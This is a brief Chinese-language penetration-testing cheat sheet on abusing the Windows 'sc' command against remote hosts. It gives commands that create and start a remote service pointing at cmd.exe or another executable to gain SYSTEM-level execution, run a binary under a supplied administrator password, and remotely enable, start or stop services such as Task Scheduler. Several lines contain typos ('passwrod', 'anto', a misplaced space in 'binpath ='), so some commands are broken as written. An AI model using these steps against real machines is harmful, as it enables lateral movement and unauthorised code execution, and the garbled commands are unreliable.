sc 在滲透中常用的功能有三個,遠程執行東西,遠程開啟/關閉服務,查服務的信息,如服務的exe路徑。
1.1 執行命令(系統權限):
sc \\10.1.1.1 create winnt binpath= c:\cmd.exe
sc \\10.1.1.1 start winnt
sc \\10.1.1.1 delete winnt
1.2 執行命令(指定用戶權限)
sc \\10.1.1.1 create adminsec binpath = "c:\pass.exe" obj= "adminsec\administrator" passwrod= adminsec
sc \\ip start testsrvname
2、 遠程開啟/關閉服務,如啟動計劃任務。感覺at執行東西比sc兼容更好。
sc.exe \\10.1.1.1 config schedule start= auto //注意=後面有個空格,有時候不anto開啟不成功。
sc.exe \\10.1.1.1 start "schedule"
關閉某個服務:
sc getkeyname "Task Scheduler" //獲取服務名
sc stop "Schedule"
其他技巧,如需要獲取某個服務的執行文件路徑。
sc qc schedule
PS: sc要注意的是服務名和顯示名,這2個是不同的概念